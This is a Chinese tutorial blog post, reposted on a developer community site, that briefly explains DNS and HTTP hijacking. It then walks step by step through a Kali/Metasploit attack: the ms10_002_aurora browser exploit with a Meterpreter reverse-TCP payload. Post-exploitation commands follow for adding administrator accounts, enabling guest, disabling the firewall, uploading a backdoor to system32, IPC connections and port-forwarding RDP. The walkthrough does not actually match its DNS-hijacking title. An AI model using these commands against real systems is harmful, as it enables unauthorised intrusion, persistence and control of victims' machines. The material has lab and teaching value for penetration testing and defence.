kali之DNS劫持-阿里云开发者社区

开发者社区> 余二五> 正文

kali之DNS劫持

简介:
+关注继续查看

DNS劫持:用户上网的DNS服务器都是运营商分配的,所以,在这个节点上,运营商可以为所欲为
例如:访问一个网站,输入域名,正常DNS服务器返回该域名的IP,而DNS劫持后,会返回一个运营商额中间服务器IP,该访问服务器会一致性的返回302,让用户浏览器跳转到预处理好的带广告的网页,在该网页中再通过iframe打开用户原来访问的地址

HTTP劫持:
在运营商的路由器节点上,设置协议检测,一旦发现是http请求,而且是html类型请求,则拦截处理。后续做法往往分为2种、1种是DNS劫持返回302让用户浏览器跳转到另外的地址,还有1种是在服务器返回的HTML数据中插入js或dom节点广告


保证网络连通性,配置网络地址

wKioL1lTbDHAQNoTAAONomhQPZA494.jpg

第一次使用msfconsole,开启内建的数据库PostgreSQL和metasplote

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start 

 root@kali:~ps -e|grep 5432(确保postgresql服务开启,默认占用端口是5432)

root@kali:~# msfconsole

wKiom1lTa_zwGengAAHy0wFA5dc620.jpg

查找10-002漏洞模块 search 10-002

wKiom1lTbGOjUMbrAANSYfqtYH8138.jpg

use exploit/windows/browser/ms10_002_aurora 进行漏洞攻击

set payload windows/meterpreter/reverse_tcp 定义攻击载荷 
set lhost 192.168.48.123 定义本机地址
set URIPATH / 定义url的后缀(这里我只设置了一个/)
exploit 开发

wKiom1lTbLDTHqYGAAPi-BV6hUk489.jpg

在攻击主机打开目标网站http://192.168.48.123:8080/

wKioL1lTbUjyzITDAAFdKKRfjFM974.jpg

sessions -i 1 打开连接会话

session 查看已经成功获取的会话,使用session -i 连接到指定序号的meterpreter会话已继续利用

通过shell 获取目标主机的远程命令行

通过DOS创建账号与密码

wKioL1lTpiCSq6kFAAJvTNv0odM262.jpg

Windows常用命令

wKiom1m3w46QYwW8AAHHQNERV7M910.jpg

1、net localgroup administrators    用户名 密码 /add(将用户加到管理员,使其拥有管理权限)
2、net user guest /active:yes (激活guest用户)
3、net user guest 12345 (修改guest密码为12345)
4、net user (查看账号属性)
5、net start  (查看开启了那些服务)
6、net time \\ 目标ip   (查看对方时间)
7、net view (查看局域网中开启了那些共享)
8、net share  (查看本地开启的那些共享)
9、net share C$/del        (删除c盘默认共享)
10、Copy xx.exe\\ip\admin$\System32 (将当前xx.exe复制到对方Admin$共享的System32目录内)
11、sc config tlnesvr start= auto (修改telnet服务的启动方式为自动,auto前面有一个空格)
12、net stop sharedaccess(关闭系统自带的防火墙)
13、net send IP 消息(利用messenger服务向目标IP发送消息)
14、tasklist(查看进程)
15、taskkill (结束进程)ntsd     强制结束进程
16、services.msc   进入本地计算机的服务

17、net use \\ip\ipc$ “” /user (建立空IPC链接)
18、net use \\ip\ipc$ “密码” /user:”用户名”(建立IPC非空连接,非空链接就是需要账户和密码)
19、net use \\ip\ipc$ /del   (删除ipc空连接)
20、net use z: \\127.0.0.1\c$  (映射目标主机磁盘c盘到本地磁盘z盘)

远程连接该系统

rdesktop  -u  administrator  -p  123  192.168.48.100:3389

wKiom1lTpoqz2fysAAM7hxopnrk036.jpg

getuid查看meterpreter注入到目标主机的进程所属用户
upload命令上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload  setup.exe  C:\\windows\\system32\
portfwd 端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd  add -l  1122 -p 3389 -r  192.168.48.100
把目标主机192.168.48.100的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rdesktop  -u  administrator  -p  123456  192.168.48.100:1122
sysinfo查看目标主机系统信息
ps 查看目标主机上运行的进程信息,结合migrate使用










本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1942769,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
计算机基础2 | 学习笔记
快速学习计算机基础2。
10 0
计算机基础3 | 学习笔记
快速学习计算机基础3。
8 0
ECS体验
有买一台服务器的想法,但是只是做小测试和共享用,并不要求太长时间和太高配置,于是,价钱便是一个问题,作为一个在校学生,钱,是第一难题。
10 0
PG+MySQL第9课-实时精准营销
通常业务场景会涉及基于标签条件圈选目标客户、基于用户特征值扩选相似人群、群体用户画像分析这些技术,本文将围绕这三个场景去介绍在实施精准营销里面的PG数据库的使用
5 0
Linux 命令执行过程 | 学习笔记
快速学习 Linux 命令执行过程。
7 0
Java classloader详解
Java程序并不是一个可执行文件,而是由很多的Java类组成,其运行是由JVM来控制的。而JVM从内存中查找到类,而真正将类加载进内存的就是ClassLoader,可以说我们每天都在接触ClassLoader,但是很多时候我们没有明白其执行的流程和原理。
5 0
冬季实战营第一期学习报告
通过五天学习与实操,对ECS云服务器入门、快速搭建LAMP环境、部署MySQL数据库、回顾搭建Docker环境和Spring Boot以及使用PolarDB和ECS搭建门户网站操作,对本期学习与实操的认识。
7 0
Redis高可用架构演进
Redis是目前使用最广泛的缓存程序之一,也被应用于多种场景,例如数据缓存、分布式锁等,Redis官方提供了多种部署架构,以满足不同应用场景下对于高可用和扩展性的要求。
6 0
MySQL高可用架构演进
MySQL是数据库领域当之无愧的霸主之一,其在各行各业被广泛应用,随着广泛使用,对于MySQL本身的高可用性的要求就是不可避免的话题,而MySQL的高可用方案也随着MySQL功能的完善经历了多次升级,本文将对MySQL的各种高可用架构进行分析,以此来了解架构的演进。
6 0
系统安装前准备 | 学习笔记
快速学习系统安装前准备。
5 0
+关注
20382
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
《2021云上架构与运维峰会演讲合集》
立即下载
《零基础CSS入门教程》
立即下载
《零基础HTML入门教程》
立即下载